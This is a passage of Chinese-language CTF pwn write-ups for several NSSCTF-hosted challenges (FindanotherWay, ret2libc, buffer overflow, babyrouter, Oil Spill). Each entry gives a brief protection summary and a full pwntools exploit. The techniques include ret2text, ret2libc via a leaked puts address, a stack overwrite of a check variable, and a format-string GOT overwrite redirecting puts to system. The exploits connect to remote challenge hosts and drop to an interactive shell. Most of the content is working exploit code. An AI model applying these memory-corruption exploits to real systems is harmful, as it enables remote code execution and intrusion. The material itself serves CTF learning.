r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',21699)
elf = ELF('pwn (2)')
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
sla(b'there?\n', b'1')
srand = libc.srand(libc.time(0))
for i in range(100):
sla(b'it?\n', str((libc.rand()%100000) + 1))
pr()
[SWPUCTF 2022 新生赛]FindanotherWay
64位ret2text。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',28917)
elf=ELF('./FindanotherWay')
ret=0x40101a
payload=b'a'*(0xc+8)+p64(ret)+p64(0x401230)
sla(b'way?\n',payload)
inter()
[MoeCTF 2022]ret2libc
64位NX保护
典型的ret2libc。
exp
from pwn import *
from LibcSearcher import *
#context(os = 'linux', arch = 'amd64', log_level='debug')
#io=process('pwn4')
io= remote('node5.anna.nssctf.cn',28982)
elf=ELF('pwn (2)')
rdi = 0x40117e
ret = 0x40101a
main=0x401183
rsi_r15=0x4007d1
#payload1=b'a'*(0x28)+p64(rdi)+p64(1)+p64(rsi_r15)+p64(elf.got['read'])+p64(1)+p64(elf.plt['write'])+p64(ret)+p64(main)
payload1=b'a'*(0x48)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
io.sendline(payload1)
puts_ad=u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=LibcSearcher('puts',puts_ad)
'''
base=read_ad-libc.sym['read']
print(hex(base))
sys=base+libc.sym['system']
sh=base+next(libc.search(b'/bin/sh'))
'''
libc = LibcSearcher('puts',puts_ad)
libc_base = puts_ad - libc.dump('puts')
print(hex(libc_base))
sys= libc_base + libc.dump('system')
sh = libc_base + libc.dump('str_bin_sh')
payload2=b'a'*(0x48)+p64(ret)+p64(rdi)+p64(sh)+p64(sys)
io.sendline(payload2)
io.interactive()
[MoeCTF 2022]buffer overflow
64位保护全开
存在栈溢出。
需要覆盖v5为ans上的值。
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',21961)
elf=ELF('pwn (3)')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
sa(b'note:\n', b'a'*0x46+b'Limiter and Wings are beautiful girls!\x00')
inter()
[BJDCTF 2020]babyrouter
64位NX保护。
nc连接,选1,然后发送cat flag即可。
[SDCTF 2022]Oil Spill
64位开启了NX和canary保护。
存在格式化字符串漏洞。
已经给出了puts函数的真实地址。
改puts函数got表为system函数,改x为/bin/sh即可。偏移为8
exp
from pwn import *
from struct import pack
from ctypes import *
import base64
from LibcSearcher import *
def debug(c = 0):
if(c):
gdb.attach(p, c)
else:
gdb.attach(p)
pause()
def get_sb() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
#-----------------------------------------------------------------------------------------
s = lambda data : p.send(data)
sa = lambda text,data :p.sendafter(text, data)
sl = lambda data :p.sendline(data)
sla = lambda text,data :p.sendlineafter(text, data)
r = lambda num=4096 :p.recv(num)
rl = lambda text :p.recvuntil(text)
pr = lambda num=4096 :print(p.recv(num))
inter = lambda :p.interactive()
l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00'))
uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00'))
int16 = lambda data :int(data,16)
lg= lambda s, num :p.success('%s -> 0x%x' % (s, num))
#-----------------------------------------------------------------------------------------
#context(os='linux', arch='i386', log_level='debug')
context(os='linux', arch='amd64', log_level='debug')
#p=process('service')
p = remote('node5.anna.nssctf.cn',26473)
elf=ELF('OilSpill')
libc=ELF('./glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so')
puts_got=int(r(14),16)
libc_base = puts_got - libc.sym['puts']
print(hex(libc_base))
system = libc_base + libc.sym['system']
payload=fmtstr_payload(8, {elf.got['puts']:system, 0x600C80:b'/bin/sh\x00'})
sla(b'clean it?\n',payload)
inter()